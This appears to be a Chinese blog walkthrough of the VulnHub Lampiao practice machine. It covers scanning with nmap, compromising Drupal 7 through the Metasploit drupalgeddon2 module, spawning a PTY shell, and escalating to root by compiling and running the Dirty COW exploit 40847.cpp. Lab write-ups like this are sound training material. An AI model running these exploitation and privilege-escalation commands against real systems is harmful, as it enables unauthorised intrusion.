vulnhub靶场之Lampiao

1 信息收集

1.1 主机发现

arp-scan -l

主机IP地址为:192.168.1.15

1.2 端口发现

nmap -sS -sV -A -T5 -p- 192.168.1.15

2 端口访问

2.1 80端口访问

2.2 1898端口访问

并且指纹识别信息,是一个drupal7的cms

3 渗透

3.1 利用msf渗透

1 在msf上搜索漏洞

search drupal

2 渗透

use exploit/unix/webapp/drupal_drupalgeddon2  
set rhost 182.168.1.15
set rport 1898
run

4 提权

进入shell后,这个shell的界面不全,使用python的伪终端进行优化

python -c "import pty;pty.spawn('/bin/bash')"

4.1 提权

查看是否可以suid提权

find / -perm -4000 2>/dev/null

参考suid的提权的命令在线网站 GTFOBins 没有suid提权

查看版本内核信息

4.2 藏牛提权

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

    RHEL7 Linux x86_64
    RHEL4(4.4.7-16)
    Debian 7(“wheel”)
    Ubuntu 14.04.1 LTS
    Ubuntu 14.04.5 LTS
    Ubuntu 16.04.1 LTS
    Ubuntu 16.10
    Linux Mint 17.2

这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。或者直接在kali上输入

searchsploit dirty

这里使用40847.cpp,其他的可能会使靶机崩溃。

上传漏洞的源码到靶机上
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp 
 
使用python调出交互模式
python -c "import pty; pty.spawn('/bin/bash')"

编译
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
运行
./dcow -s

  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值